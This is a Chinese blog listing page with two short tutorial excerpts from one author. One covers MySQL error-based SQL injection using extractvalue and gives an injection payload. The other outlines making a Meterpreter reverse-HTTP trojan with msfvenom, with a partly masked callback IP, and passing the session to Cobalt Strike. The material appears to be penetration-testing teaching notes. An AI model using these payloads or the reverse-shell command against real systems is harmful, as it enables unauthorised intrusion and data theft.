摘要: 函数extractvalue(参数1,参数2) 使用条件:mysql版本5.1以上 有长度限制32位 参数1:XML文档,参数2:XPAT语句 用法: extractvalue(1,concat(0x7e,(select user()),0x7e)) ?id=1' and extractvalue( 阅读全文
posted @ 2021-08-31 21:55 PatrickStar88888888 阅读(255) 评论(0) 推荐(0) 编辑
摘要: 流程: 大致流程,msfvenom生成木马->目标机运行木马->msf监听到会话->转移到CS 开始: 先让服务端的CS上线 cs客户端连接cs服务端 cs设置监听 生成木马 msfvenom -p windows/x64/meterpreter_reverse_http lhost=104.xx. 阅读全文
posted @ 2021-08-31 17:24 PatrickStar88888888 阅读(109) 评论(0) 推荐(0) 编辑